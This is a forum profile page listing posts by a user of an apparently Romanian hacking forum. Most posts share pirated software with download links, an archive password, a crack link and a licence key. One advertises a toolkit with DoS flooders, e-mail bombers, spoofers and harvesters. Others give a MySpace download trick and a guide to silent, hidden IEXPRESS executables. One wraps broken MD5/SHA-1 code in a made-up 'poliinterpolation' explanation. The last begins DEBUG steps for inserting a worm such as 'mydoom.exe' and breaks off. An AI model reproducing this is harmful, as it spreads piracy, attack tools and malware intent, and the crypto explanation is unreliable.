Jump to content

Gonzalez

Active Members
  • Posts

    1576
  • Joined

  • Last visited

  • Days Won

    9

Posts posted by Gonzalez

  1. Hide IP is the software you are looking for! Keeping your privacy is simple and easy: the only thing you need to do is open Hide IP. Hide IP will find the proxy server available to you and set it as your proxy server automatically. There is nothing need you to concern. Hide IP have done everything for you!

    Key Features of Hide IP Platinum:

    - Hide IP Platinum searches for HIGH anonymous proxy server and makes you complete invisible to any websites you are surfing

    - Protect you from any website that wants to monitor your reading interests and spy upon you through your unique IP address - your ID in the Internet

    - Avoid your personal information be used to send you spam and junk emails by many marketers and advertising agencies who having information about your interests and knowing your IP address as well as your email

    - Keeping your computer away from hacker attacks by hiding your IP address as well as information about your operation system

    - Ability to frequently change IP addresses increases privacy

    - Enable and disable Hide IP Platinum as your wish with a single click

    - Bypass the restrictions by some owners of Internet resources on users from certain countries or geographical regions

    - Post on bulletin boards without displaying your real IP address

    - Use with a web based mail service to send anonymous email

    - Doesn’t like oher services force you to pay a monthly fee for anonymous surfing. For a low one-time price, you can visit whatever web sites without anyone ever finding out

    - Works with Internet Explorer, Opera, Mozilla Firefox in Windows 98, ME, 2000, XP, 2003

    Changes in Hide IP Platinum 3.2, 9/23/2006 :

    - Added: Multiple skins

    - Fixed: Serial Number input window is not translated

    - Fixed: Showing taskbar icon

    Download

    http://rapidshare.de/files/34181129/0060.rar

    pass: upload_by_sundevil

  2. SQL Server Backup is a backup and restore utility for Microsoft SQL Server 2005 , 2000 , 7.0 , MSDE , WMSDE , SQL Server 2005 Express. It can backup SQL Server database to local hard disk or network storage device ,and restore database with a new name or move database files to a new location , restore database to the point of failure . It fully integrates with Windows Task Scheduler engine , supports data compression and encryption .

    Download:

    http://www.databk.com/download/ssbk.zip

    Addon:

    http://www.crackserver.com/0day_cracks/SQL.Server.Backup.v6.0.3.768.htm

    Credit: Bizz4r

  3. Sunt sigur ca ati mai auzit de acest program.

    Net Tools

    is cutting-edge security and network monitoring software for the Internet and Local Area Networks, providing clients with the ability and confidence to meet the challenges of tomorrow's technology. Keeping pace with the industry trends, we offer professional tools that support the latest standards, protocols, software, and hardware for both wired and wireless networks. The main goal is the creation of high quality software. Net Tools is a very strong combination of network scanning, security, file, system, and administrator tools useful in diagnosing networks and monitoring your PC and computer's network connections for system administrators. Next to the essential core tools it includes a lot of extra valuable features. It’s a Swiss Army knife for everyone interested in a set of powerful network tools for everyday use. This all-in-one toolkit includes also a lot of handy file and system utilities next to the huge amount of network tools. The menus are fully configurable, so in this way you won’t get lost in the extremely large amount of essential tools. All the additional features will make this application a must have for all system administrators. There are numerous constructive and valuable applications included in Net Tools that can be used for a great amount of purposes. The latest version of Net Tools is hybrid; it means that it’s capable of working together with applications that are made and designed for Net Tools, so in this way more flexibility and user-friendliness is obtained. This software is designed for the Microsoft Windows OS (Windows 98, NT, 2000, 2003, XP, Vista). It’s entirely compatible and has thoroughly been tested on Windows XP. With the 150+ tools it is a great collection of useful tools for network users. The size of Net Tools 4.5.74 is approximately 25 Mb.

    Contents

    Net Tools 4.5 (build 74) contains a whole variety of network tools. Here is a list of the most important tools:

    1) IP Address Scanner

    2) IP Calculator

    3) IP Converter

    4) Port Listener

    5) Port Scanner

    6) Ping

    7) NetStat (2 ways)

    Cool Trace Route (2 ways)

    9) TCP/IP Configuration

    10) Online - Offline Checker

    11) Resolve Host & IP

    12) Time Sync

    13) Whois & MX Lookup

    14) Connect0r

    15) Connection Analysator and protector

    16) Net Sender

    17) E-mail seeker

    1Cool Net Pager

    19) Active and Passive port scanner

    20) Spoofer

    21) Hack Trapper

    22) HTTP flooder (DoS)

    23) Mass Website Visiter

    24) Advanced Port Scanner

    25) Trojan Hunter (Multi IP)

    26) Port Connecter Tool

    27) Advanced Spoofer

    2Cool Advanced Anonymous E-mailer

    29) Simple Anonymous E-mailer

    30) Anonymous E-mailer with Attachment Support

    31) Mass E-mailer

    32) E-mail Bomber

    33) E-mail Spoofer

    34) Simple Port Scanner (fast)

    35) Advanced Netstat Monitoring

    36) X Pinger

    37) Web Page Scanner

    3Cool Fast Port Scanner

    39) Deep Port Scanner

    40) Fastest Host Scanner (UDP)

    41) Get Header

    42) Open Port Scanner

    43) Multi Port Scanner

    44) HTTP scanner (Open port 80 subnet scanner)

    45) Multi Ping for Cisco Routers

    46) TCP Packet Sniffer

    47) UDP flooder

    4Cool Resolve and Ping

    49) Multi IP ping

    50) File Dependency Sniffer

    51) EXE-joiner (bind 2 files)

    52) Encrypter

    53) Advanced Encryption

    54) File Difference Engine

    55) File Comparasion

    56) Mass File Renamer

    57) Add Bytes to EXE

    5Cool Variable Encryption

    59) Simple File Encryption

    60) ASCII to Binary (and Binary to ASCII)

    61) Enigma

    62) Password Unmasker

    63) Credit Card Number Validate and Generate

    64) Create Local HTTP Server

    65) eXtreme UDP Flooder

    66) Web Server Scanner

    67) Force Reboot

    6Cool Webpage Info Seeker

    69) Bouncer

    70) Advanced Packet Sniffer

    71) IRC server creater

    72) Connection Tester

    73) Fake Mail Sender

    74) Bandwidth Monitor

    75) Remote Desktop Protocol Scanner

    76) MX Query

    77) Messenger Packet Sniffer

    7Cool API Spy

    79) DHCP Restart

    80) File Merger

    81) E-mail Extractor (crawler / harvester bot)

    82) Open FTP Scanner

    83) Advanced System Locker

    84) Advanced System Information

    85) CPU Monitor

    86) Windows Startup Manager

    87) Process Checker

    8Cool IP String Collecter

    89) Mass Auto-Emailer (Database mailer; Spammer)

    90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)

    91) Fishing Port Scanner (with named ports)

    92) Mouse Record / Play Automation (Macro Tool)

    93) Internet / LAN Messenger Chat (Server + Client)

    94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control

    95) Hash MD5 Checker

    96) Port Connect - Listen tool

    97) Internet MAC Address Scanner (Multiple IP)

    9Cool Connection Manager / Monitor

    99) Direct Peer Connecter (Send/Receive files + chat)

    100) Force Application Termination (against Viruses and Spyware)

    101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)

    102) COM Detect and Test

    103) Create Virtual Drives

    104) URL Encoder

    105) WEP/WPA Key Generator

    106) Sniffer.NET

    107) File Shredder

    10b) Local Access Enumerater

    109) Steganographer (Art of hiding secret data in pictures)

    110) Subnet Calculater

    111) Domain to IP (DNS)

    112) Get SNMP Variables

    113) Internet Explorer Password Revealer

    114) Advanced Multi Port Scanner

    115) Port Identification List (+port scanner)

    116) Get Quick Net Info

    117) Get Remote MAC Address

    11b) Share Add

    119) Net Wanderer

    120) WhoIs Console

    121) Cookies Analyser

    122) Hide Secret Data In Files

    123) Packet Generator

    124) Secure File Splitting

    125) My File Protection (Password Protect Files, File Injections)

    126) Dynamic Switch Port Mapper

    127) Internet Logger (Log URL)

    12b) Get Whois Servers

    129) File Split&Merge

    130) Hide Drive

    131) Extract E-mails from Documents

    132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)

    133) Hook Spy

    134) Software Uninstaller

    135) Tweak & Clean XP

    136) Steganographic Random Byte Encryption

    137) NetTools Notepad (encrypt your sensitive data)

    13b) File Encrypter/Decrypter

    139) Quick Proxy Server

    140) Connection Redirector (HTTP, IRC, ... All protocols supported)

    141) Local E-mail Extractor

    142) Recursive E-mail Extractor

    143) Outlook Express E-mail Extractor

    144) Telnet Client

    145) Fast Ip Catcher

    146) Monitor Host IP

    147) FreeMAC (MAC Address Editor)

    14b) QuickFTP Server (+user accounts support)

    149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)

    150) Network Protocol Analyzer

    151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)

    152) WebMirror (Website Ripper)

    153) Extra Tools (nmap console & win32 version)

    154) ...

    Download:

    http://rapidshare.de/files/34017895/0042.rar

    pass: upload_by_sundevil

  4. OLD METHOD

    MySpace allows you to listen to a lot of music, but they only allow you to download a select few of the songs. Here is the work around.

    1. Goto the MySpace site that you want to download the music from

    2. That page must have at least one song available for download

    3. Open notepad

    4. Right-click the download link and select copy Link

    5. Paste this link into your notepad

    You see something like this:

    http://mp3download.myspace.com/index.cfm?fuseaction= bandprofile.downloadSong&bsid=OldSongNumberHere&so ng_name= Title of the Old Song Here &fid=bandid

    6. Right-click the add link and select copy link

    7. Paste this into your notepad

    You will see something like this:

    asfunction:addSong,NewSongNumber^Title of the New Song Here

    8. Now in the original URL just replace the old song number and old title with the new number and title. Paste this URL into your browser and click OK.

    9. After several seconds, you will be prompted to download the song.

    Here's an example:

    Site: http://www.myspace.com/monstersarewaiting

    The one downloadable song Christine...

    http://mp3download.myspace.com/index.cfm?fuseaction= bandprofile.downloadSong&bsid=535475&song_name=Chr istine&fid=7570106

    The add link to Don't Go...

    asfunction:addSong,2373353^Don%27t%20Go^Monsters %20Are%20Waiting%2E%2E%2E%2E%2E%2E

    The new hacked URL...

    http://mp3download.myspace.com/index.cfm?fuseaction= bandprofile.downloadSong&bsid=2373353&song_name= Don%27t%20Go^Monsters%20Are%20Waiting%2E%2E%2E%2E% 2E%2E&fid=7570106

    NEW METHOD

    All we need to do is get the XML file that the player loads and reads. The easiest way to do this is to clear your IE cache, reload the player from the band's site, and look for the XML file that gets created in your cache directory. The XML file may not be easy to spot without a clean cache directory. The file generally follows this naming convention:

    MP3_XML.cfm?xmlfid=bandid&rand=xxxxxxxxxx (10 digit random number)

    Cut and paste that XML file onto your desktop and open it wth Notepad.

    Once you look in the XML file you will see the direct path of the mp3 song. For example: "92/12/57836332/57836332_d13db5fz.mp3" (this is an invalid link -- just an example)

    After this, append that directory to http://musicstream.myspace.com and you're golden. For example, " http://musicstream.myspace.com/92/12/57836332/57836332_d13db5fz.mp3"

    Credit: Blade

  5. Windows XP will not allow you to pin a shortcut to the start menu that points to a network drive. For this reason it can be necessary to write a batch file to launch a program. The issue is that a shortcut pointed to a .bat file also contains no “Pin to Start Menu� option. While it can be dragged onto the start menu, this leaves no option for scripting these shortcuts. The simple solution is to convert the .bat file to an .exe file and lucky for us Windows XP includes a tool that can do it…

    Step 1

    Navigate to C:WindowsSystem32 and locate the file named IEXPRESS.EXE

    Step 2

    Double Click to launch IEXPRESS.EXE

    Step 3

    You will be presented with the initial welcome screen and be given two choices. Select “Create new Self Extraction Directive file.� Click Next.

    Step 4

    Next you will be presented with the Package Purpose screen. For our purposes select “Extract Files and run an installation command� and click the Next button.

    Step 5

    You will be presented with the Package Title screen, which will give you the opportunity to give your project a name. If you are so inclined give it a meaningful name. If like me you are never going to come back to this, name it whatever you want.

    Step 6

    You will next be presented with the Confirmation Prompt Screen. We would like the batch file to just be extracted and run so just choose “No Prompt� and click the Next Button.

    Step 7

    You are presented with the License Agreement window. If you don’t want your users to have to answer a prompt select “Do not display a license.�

    Step 8

    The Packaged Files window is where you will select your batch file (or .vbs). Click the Add button and browse to your desired file. Then click next.

    Step 9

    Here you are presented with a window titled Install Program to Launch. Use the drop down control next to “Install Program and choose the only option that will be present, the .bat or .vbs file that you chose in the previous window.

    Step 10

    The Show Window screen is next. I didn’t want my users to be prompted in any way so I chose Hidden. Click Next.

    Step 11

    No Finished Message for my users. Select “No message� and choose Next.

    Step 12

    The Package Name and Options window is where the new .exe specified. Type in a path or browse to the folder you would like your .exe in, type a name in the file name box and click save. Also check the box that says “Hide File Extraction Progress Animation from User.� If you’re worried about long file names go ahead and click the other box as well.

    Step 13

    Since we really aren’t installing anything we probably want to tell the Configure Restart window to not restart. So choose the option that says “No restart� and hit Next.

    Step 14

    This window is where you have a chance to save all of the options you have chosen into a project file so that if necessary you may later return and make modifications. I have no need to retain the file, but if you would like to be able to come back to it, by all means choose “Save Self Extraction Directive (SED) file� and tell it where to put it. As always, click Next.

    Step 15

    Here’s where you’re new .exe is born, on the Create Package screen. Explore to the directory you told it to put the file in, click Next and then watch your little .exe’s first moments as it pops into the big digital world.

    Step 16

    You’re done! Click finish and go try it out. Pin it directly to the start menu. Point a shortcut to it and pin that to the start menu.

    Credit: Geo322

  6. Pro PHP XML and Web Services is the authoritative guide to using the XML features of PHP 5 and PHP 6. No other book covers XML and Web Services in PHP as deeply as this title. The first four chapters introduce the core concepts of XML required for proficiency, and will bring you up to speed on the terminology and key concepts you need to proceed with the rest of the book. Next, the book explores utilizing XML and Web Services with PHP5. Topics include DOM, SimpleXML, SAX, xmlReader, XSLT, RDF, RSS, WDDX, XML-RPC, REST, SOAP, and UDDI.

    Author Robert Richards, a major contributor to the PHP XML codebase, is a leading expert in the PHP community. In this book, Richards covers all topics in depth, blending theory with practical examples. You'll find case studies for the most popular web services like Amazon, Google, eBay, and Yahoo. The book also covers XML capabilities, demonstrated through informative examples, in the PEAR libraries.

    Download:

    http://rapidshare.de/files/31402081/Apress.Pro.PHP.XML.and.Web.Services.Mar.2006.rar

  7. AVG Professional is simple to install and operate. No IT expertise is required and it can run in the background, providing uninterrupted protection. All file and e-mail activity is checked automatically, allowing you to get on with your work without worrying about viruses.

    AVG Professional is extremely reliable , fast and light on resources, so, no matter how demanding a user you are, it won't slow down your performance.

    Key features :

    · A 2 year license, so you can receive free updates and full product support for a whole 2 years. It includes free 24 hour a day e-mail access to Grisoft’s professional team of technical experts

    · Free program and virus updates are provided via ultra reliable Akamai servers. AVG Professional Edition updates itself automatically whenever updates are available. Alternatively you can update manually, or configure AVG Professional to download updates at a scheduled time that suits you.

    · Multiple language support in one package. No need to buy a special language version as all languages are included in the one product. A simple click of the mouse and the entire interface (including help files) will instantly change to your required language

    · AVG holds the VB100% award and is ICSA certified, so you can be assured of the highest level of antivirus protection.

    · AVG Professional Edition has many more features that make it the best value antivirus protection available

    · The powerful AVG Resident Shield provides maximum protection by scanning every file opened, executed, or saved. It will also prevent the opening or executing of infected files.

    · The AVG Personal E-mail Scanner checks every e-mail sent or received, providing much needed protection from e-mail borne threats. AVG supports all leading e-mail clients including MS Outlook, The bat!, Eudora and all other SMTP/POP3 based email clients such as Outlook Express. Encrypted connections using SSL are also supported.

    · AVG Professional can scan attachments of instant message services (like ICQ, MSN Messenger) for viruses and other threats.

    · AVG provides support for the detection of "potentially unwanted programs".

    · AVG’s scanning engine uses a unique combination of heuristic analysis and generic detection methods to detect all known viruses.

    · The AVG Resident Shield can include/exclude files from scanning based on individual file extensions.

    · Automatically attempts to heal/remove infected files and other threats such as trojans, worms, and java applets. Removed files are quarantined in the AVG Virus Vault.

    · AVG Professional has flexible password protection so you can select which settings you wish to protect from other users.

    · AVG Professional now supports Microsoft Windows 64 bit platforms.

    Download:


    [url]http://rapidshare.de/files/33882792/AVG_7.1.407a804-SPA-.rar.html[/url]

  8. PHP Expert Editor is an easy-to-use PHP IDE (Integrated Development Environment) for Windows. This Editor specially designed for PHP-masters and has a nice features for beginners and professional programmers. PHP Expert Editor has internal HTTP-server and Debugger to run, test and debug PHP scripts (you can use any external HTTP-server also). The PHP Syntax Check, internal browser, Code Explorer, File Explorer, FTP client, Project Explorer, Library Explorer, Code Templates, three modes of code highlighting (PHP & HTML, HTML only, PHP only), Java Script and CSS files highlighting, quick navigation in code, and much more.

    Program's Features

    * Three modes of Code Highlighting (PHP & HTML; HTML only; PHP only). Java Script and CSS files highlighting.

    * Internal Browser

    * FTP Client

    * The Code Explorer

    * The File Explorer with Favorites

    * The Project Explorer

    * The Library Explorer

    * Keyboard Macros

    * PHP Macros

    * Autosaving

    * PHP Syntax Check

    * Run the PHP script and preview the result in the internal or external browser

    * PHP Debugger

    * For running and debugging PHP scripts you can use internal or external HTTP-server.

    * Full report of script's Errors and Warnings

    * Full control of the script's input data

    * All Content-Type(s) supported. You can run scripts that generate any content (for example images)

    * Quick inserting the PHP functions with parameters hint.

    * Quick Navigation in PHP Code by mouse right-click and hot keys

    * Brackets highlighting

    * Customizable Code Templates

    * Source code export to HTML and print with syntax highlighting

    * Bookmarks

    * Classic or XP interface styles.

    * PHP Help support with a fast search of keyword

    * Keymapping (Default, Classic, Brief, Epsilon, Visual Studio)

    * Windows/Unix/Mac file formats support

    Download:

    http://www.ankord.com/download/phpxedit_33.zip

    Key:

    0VmDCHjKpmu6pbzBTDgWjf2RN6ftepkCpxJU1piort0qroEOn2BYwCozJ5SvkXmqzXD0RzLKRUVHMLoG
    oH3nd9Gh2kbP6pFURELKk8JpOArCthcGadIkcWwyto0qh023hdXhFUR0ZXE5dxfxWuGay9zuvVY+B2yY
    65oq/baT4g1s=

  9. Pentru programatori inraiti

    The MD5 process is a poliinterpolation process, you know, i still implement a "pure" MD5 implementation,

    but how it's works?

    You'll see MD process based on a interpolation very easy, take a minus length bit on each byte for the source

    string called "factor", interpolate each z factors (mathemathics) betwen a "probabilistical table" like a huffman process

    where take each char and take only 4 bits and distribute in the probabilistical table, the result is a y factor but with 2 bits.

    (compression method).

    MD process is the most fast machine for interpolate any text. the MD5 process implement the original taken z factoring,

    when the exchange process is run you can mix the MD process with another encryption method, not support strong methods

    like a RCs or vernnam military algoritms (only tested with 3DES, RC4 low, Rijndael, MD4, sha-1 carry).

    On the "passing through" on each interpolate z factors is necesary convert to base64 each char resultant value and cicling it

    on the MD process because MD reverse process not accept no printable chars because the length on minus z factors.

    the mix process on it is when MD process find the minus z factor and recombine with the probabilistical table:

    #define GET_UINT32_LE(n,b,i)                    
    {
    (n) = ( (uint32) ([(i) ] )
    | ( (uint32) ([(i) + 1] << 8 )
    | ( (uint32) ([(i) + 2] << 16 )
    | ( (uint32) ([(i) + 3] << 24 );
    }

    void md5_process( md5_context *ctx, uint8 data[64] )
    {
    uint32 X[16], A, B, C, D;

    GET_UINT32_LE( X[0], data, 0 );
    GET_UINT32_LE( X[1], data, 4 );
    GET_UINT32_LE( X[2], data, 8 );
    GET_UINT32_LE( X[3], data, 12 );
    GET_UINT32_LE( X[4], data, 16 );
    GET_UINT32_LE( X[5], data, 20 );
    GET_UINT32_LE( X[6], data, 24 );
    GET_UINT32_LE( X[7], data, 28 );
    GET_UINT32_LE( X[8], data, 32 );
    GET_UINT32_LE( X[9], data, 36 );
    GET_UINT32_LE( X[10], data, 40 );
    GET_UINT32_LE( X[11], data, 44 );
    GET_UINT32_LE( X[12], data, 48 );
    GET_UINT32_LE( X[13], data, 52 );
    GET_UINT32_LE( X[14], data, 56 );
    GET_UINT32_LE( X[15], data, 60 );

    #define S(x,n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 - n)))

    #define P(a,b,c,d,k,s,t)
    {
    a += F(b,c,d) + X[k] + t; a = S(a,s) + b;
    }

    A = ctx->state[0];
    B = ctx->state[1];
    C = ctx->state[2];
    D = ctx->state[3];

    #define F(x,y,z) (z ^ (x & (y ^ z)))

    P( A, B, C, D, 0, 7, 0xD76AA478 );
    P( D, A, B, C, 1, 12, 0xE8C7B756 );
    P( C, D, A, B, 2, 17, 0x242070DB );
    P( B, C, D, A, 3, 22, 0xC1BDCEEE );
    P( A, B, C, D, 4, 7, 0xF57C0FAF );
    P( D, A, B, C, 5, 12, 0x4787C62A );
    P( C, D, A, B, 6, 17, 0xA8304613 );
    P( B, C, D, A, 7, 22, 0xFD469501 );
    P( A, B, C, D, 8, 7, 0x698098D8 );
    P( D, A, B, C, 9, 12, 0x8B44F7AF );
    P( C, D, A, B, 10, 17, 0xFFFF5BB1 );
    P( B, C, D, A, 11, 22, 0x895CD7BE );
    P( A, B, C, D, 12, 7, 0x6B901122 );
    P( D, A, B, C, 13, 12, 0xFD987193 );
    P( C, D, A, B, 14, 17, 0xA679438E );
    P( B, C, D, A, 15, 22, 0x49B40821 );

    #undef F

    #define F(x,y,z) (y ^ (z & (x ^ y)))

    P( A, B, C, D, 1, 5, 0xF61E2562 );
    P( D, A, B, C, 6, 9, 0xC040B340 );
    P( C, D, A, B, 11, 14, 0x265E5A51 );
    P( B, C, D, A, 0, 20, 0xE9B6C7AA );
    P( A, B, C, D, 5, 5, 0xD62F105D );
    P( D, A, B, C, 10, 9, 0x02441453 );
    P( C, D, A, B, 15, 14, 0xD8A1E681 );
    P( B, C, D, A, 4, 20, 0xE7D3FBC8 );
    P( A, B, C, D, 9, 5, 0x21E1CDE6 );
    P( D, A, B, C, 14, 9, 0xC33707D6 );
    P( C, D, A, B, 3, 14, 0xF4D50D87 );
    P( B, C, D, A, 8, 20, 0x455A14ED );
    P( A, B, C, D, 13, 5, 0xA9E3E905 );
    P( D, A, B, C, 2, 9, 0xFCEFA3F8 );
    P( C, D, A, B, 7, 14, 0x676F02D9 );
    P( B, C, D, A, 12, 20, 0x8D2A4C8A );

    #undef F

    #define F(x,y,z) (x ^ y ^ z)

    P( A, B, C, D, 5, 4, 0xFFFA3942 );
    P( D, A, B, C, 8, 11, 0x8771F681 );
    P( C, D, A, B, 11, 16, 0x6D9D6122 );
    P( B, C, D, A, 14, 23, 0xFDE5380C );
    P( A, B, C, D, 1, 4, 0xA4BEEA44 );
    P( D, A, B, C, 4, 11, 0x4BDECFA9 );
    P( C, D, A, B, 7, 16, 0xF6BB4B60 );
    P( B, C, D, A, 10, 23, 0xBEBFBC70 );
    P( A, B, C, D, 13, 4, 0x289B7EC6 );
    P( D, A, B, C, 0, 11, 0xEAA127FA );
    P( C, D, A, B, 3, 16, 0xD4EF3085 );
    P( B, C, D, A, 6, 23, 0x04881D05 );
    P( A, B, C, D, 9, 4, 0xD9D4D039 );
    P( D, A, B, C, 12, 11, 0xE6DB99E5 );
    P( C, D, A, B, 15, 16, 0x1FA27CF8 );
    P( B, C, D, A, 2, 23, 0xC4AC5665 );

    #undef F

    #define F(x,y,z) (y ^ (x | ~z))

    P( A, B, C, D, 0, 6, 0xF4292244 );
    P( D, A, B, C, 7, 10, 0x432AFF97 );
    P( C, D, A, B, 14, 15, 0xAB9423A7 );
    P( B, C, D, A, 5, 21, 0xFC93A039 );
    P( A, B, C, D, 12, 6, 0x655B59C3 );
    P( D, A, B, C, 3, 10, 0x8F0CCC92 );
    P( C, D, A, B, 10, 15, 0xFFEFF47D );
    P( B, C, D, A, 1, 21, 0x85845DD1 );
    P( A, B, C, D, 8, 6, 0x6FA87E4F );
    P( D, A, B, C, 15, 10, 0xFE2CE6E0 );
    P( C, D, A, B, 6, 15, 0xA3014314 );
    P( B, C, D, A, 13, 21, 0x4E0811A1 );
    P( A, B, C, D, 4, 6, 0xF7537E82 );
    P( D, A, B, C, 11, 10, 0xBD3AF235 );
    P( C, D, A, B, 2, 15, 0x2AD7D2BB );
    P( B, C, D, A, 9, 21, 0xEB86D391 );

    #undef F

    ctx->state[0] += A;
    ctx->state[1] += B;
    ctx->state[2] += C;
    ctx->state[3] += D;
    }

    padder virtual table

    static uint8 md5_padding[64] =
    {
    0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
    };

    This is the interpolating process, is when mix process is start:

    void sha1_starts( sha1_context *ctx )
    {
    ctx->total[0] = 0;
    ctx->total[1] = 0;

    ctx->state[0] = 0x67452301;
    ctx->state[1] = 0xEFCDAB89;
    ctx->state[2] = 0x98BADCFE;
    ctx->state[3] = 0x10325476;
    ctx->state[4] = 0xC3D2E1F0;
    }

    void sha1_process( sha1_context *ctx, uint8 data[64] )
    {
    uint32 temp, W[16], A, B, C, D, E;

    GET_UINT32_BE( W[0], data, 0 );
    GET_UINT32_BE( W[1], data, 4 );
    GET_UINT32_BE( W[2], data, 8 );
    GET_UINT32_BE( W[3], data, 12 );
    GET_UINT32_BE( W[4], data, 16 );
    GET_UINT32_BE( W[5], data, 20 );
    GET_UINT32_BE( W[6], data, 24 );
    GET_UINT32_BE( W[7], data, 28 );
    GET_UINT32_BE( W[8], data, 32 );
    GET_UINT32_BE( W[9], data, 36 );
    GET_UINT32_BE( W[10], data, 40 );
    GET_UINT32_BE( W[11], data, 44 );
    GET_UINT32_BE( W[12], data, 48 );
    GET_UINT32_BE( W[13], data, 52 );
    GET_UINT32_BE( W[14], data, 56 );
    GET_UINT32_BE( W[15], data, 60 );

    #define S(x,n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 - n)))

    #define R(t)
    (
    temp = W[(t - 3) & 0x0F] ^ W[(t - 8) & 0x0F] ^
    W[(t - 14) & 0x0F] ^ W[ t & 0x0F],
    ( W[t & 0x0F] = S(temp,1) )
    )

    #define P(a,b,c,d,e,x)
    {
    e += S(a,5) + F(b,c,d) + K + x; b = S(b,30);
    }

    A = ctx->state[0];
    B = ctx->state[1];
    C = ctx->state[2];
    D = ctx->state[3];
    E = ctx->state[4];

    #define F(x,y,z) (z ^ (x & (y ^ z)))
    #define K 0x5A827999

    P( A, B, C, D, E, W[0] );
    P( E, A, B, C, D, W[1] );
    P( D, E, A, B, C, W[2] );
    P( C, D, E, A, B, W[3] );
    P( B, C, D, E, A, W[4] );
    P( A, B, C, D, E, W[5] );
    P( E, A, B, C, D, W[6] );
    P( D, E, A, B, C, W[7] );
    P( C, D, E, A, B, W[8] );
    P( B, C, D, E, A, W[9] );
    P( A, B, C, D, E, W[10] );
    P( E, A, B, C, D, W[11] );
    P( D, E, A, B, C, W[12] );
    P( C, D, E, A, B, W[13] );
    P( B, C, D, E, A, W[14] );
    P( A, B, C, D, E, W[15] );
    P( E, A, B, C, D, R(16) );
    P( D, E, A, B, C, R(17) );
    P( C, D, E, A, B, R(18) );
    P( B, C, D, E, A, R(19) );

    #undef K
    #undef F

    #define F(x,y,z) (x ^ y ^ z)
    #define K 0x6ED9EBA1

    P( A, B, C, D, E, R(20) );
    P( E, A, B, C, D, R(21) );
    P( D, E, A, B, C, R(22) );
    P( C, D, E, A, B, R(23) );
    P( B, C, D, E, A, R(24) );
    P( A, B, C, D, E, R(25) );
    P( E, A, B, C, D, R(26) );
    P( D, E, A, B, C, R(27) );
    P( C, D, E, A, B, R(28) );
    P( B, C, D, E, A, R(29) );
    P( A, B, C, D, E, R(30) );
    P( E, A, B, C, D, R(31) );
    P( D, E, A, B, C, R(32) );
    P( C, D, E, A, B, R(33) );
    P( B, C, D, E, A, R(34) );
    P( A, B, C, D, E, R(35) );
    P( E, A, B, C, D, R(36) );
    P( D, E, A, B, C, R(37) );
    P( C, D, E, A, B, R(38) );
    P( B, C, D, E, A, R(39) );

    #undef K
    #undef F

    #define F(x,y,z) ((x & y) | (z & (x | y)))
    #define K 0x8F1BBCDC

    P( A, B, C, D, E, R(40) );
    P( E, A, B, C, D, R(41) );
    P( D, E, A, B, C, R(42) );
    P( C, D, E, A, B, R(43) );
    P( B, C, D, E, A, R(44) );
    P( A, B, C, D, E, R(45) );
    P( E, A, B, C, D, R(46) );
    P( D, E, A, B, C, R(47) );
    P( C, D, E, A, B, R(48) );
    P( B, C, D, E, A, R(49) );
    P( A, B, C, D, E, R(50) );
    P( E, A, B, C, D, R(51) );
    P( D, E, A, B, C, R(52) );
    P( C, D, E, A, B, R(53) );
    P( B, C, D, E, A, R(54) );
    P( A, B, C, D, E, R(55) );
    P( E, A, B, C, D, R(56) );
    P( D, E, A, B, C, R(57) );
    P( C, D, E, A, B, R(58) );
    P( B, C, D, E, A, R(59) );

    #undef K
    #undef F

    #define F(x,y,z) (x ^ y ^ z)
    #define K 0xCA62C1D6

    P( A, B, C, D, E, R(60) );
    P( E, A, B, C, D, R(61) );
    P( D, E, A, B, C, R(62) );
    P( C, D, E, A, B, R(63) );
    P( B, C, D, E, A, R(64) );
    P( A, B, C, D, E, R(65) );
    P( E, A, B, C, D, R(66) );
    P( D, E, A, B, C, R(67) );
    P( C, D, E, A, B, R(68) );
    P( B, C, D, E, A, R(69) );
    P( A, B, C, D, E, R(70) );
    P( E, A, B, C, D, R(71) );
    P( D, E, A, B, C, R(72) );
    P( C, D, E, A, B, R(73) );
    P( B, C, D, E, A, R(74) );
    P( A, B, C, D, E, R(75) );
    P( E, A, B, C, D, R(76) );
    P( D, E, A, B, C, R(77) );
    P( C, D, E, A, B, R(78) );
    P( B, C, D, E, A, R(79) );

    #undef K
    #undef F

    ctx->state[0] += A;
    ctx->state[1] += B;
    ctx->state[2] += C;
    ctx->state[3] += D;
    ctx->state[4] += E;
    }

    The states for change the source string is determined for the MD process, is relative the "equal" codes generated for this

    process because the probabilistical table define each z factors. But, i read in black hat advertisments (http://www.blackhat.com/ ) the antitesis for MD process explaining for "cloning MD5 fingerprints" and i suppose this guys never read the material for the z factors algotithms and i disapointed with that.

    recently work i released an application for exchange information betwen mi girl and me, called Kira Communicator, this app use the MD5 code put in this post and combine with a Rijndael crypto algotithm, also communicator use a central cryptography using a secure channel betwen the operator and the receptor, a dedicated server who cypher finally the code sended and send for this channel the data transfered on it.

    THX 2 AzRaEL [NuKE]

    www.crackenfind.net

  10. If you don't have material, toolz or ie connection and you

    wish to insert a good code (worm, virus trojan you know) and don't have your favorite

    tools you need know how you made that:

    take this action for your knowing and risk.

    if you need put:

    mydoom.exe

    you made:

    debug mydoom.exe

    -rbx

    appear on screen the values for:

    AX=0006BX=0004CX=0000DX=0000SP=FFEEBP=0000SI=0000DI=0000

    DS=0C1BES=0C1BSS=0C1BCS=0C1BIP=010A NV UP EI PL NZ NA PO NC

    0C1B:010A 0F DB oF

    this values are the flags we need in first instance, before for touch a binary,

    remember always the existence for record protection on the flags and here is where

    we started:

    Made also a backup for our master boot record:

    C:> debug
    -a
    XXXX:100 mov ax,0201
    XXXX:103 mov bx,7c00
    XXXX:106 mov cx,1
    XXXX:109 mov dx,80
    XXXX:10C int 13
    XXXX:10E int 20
    XXXX:110
    -g
    Program terminated normally
    -r cx
    CX XXXX
    :200
    -n a:sector.tbl
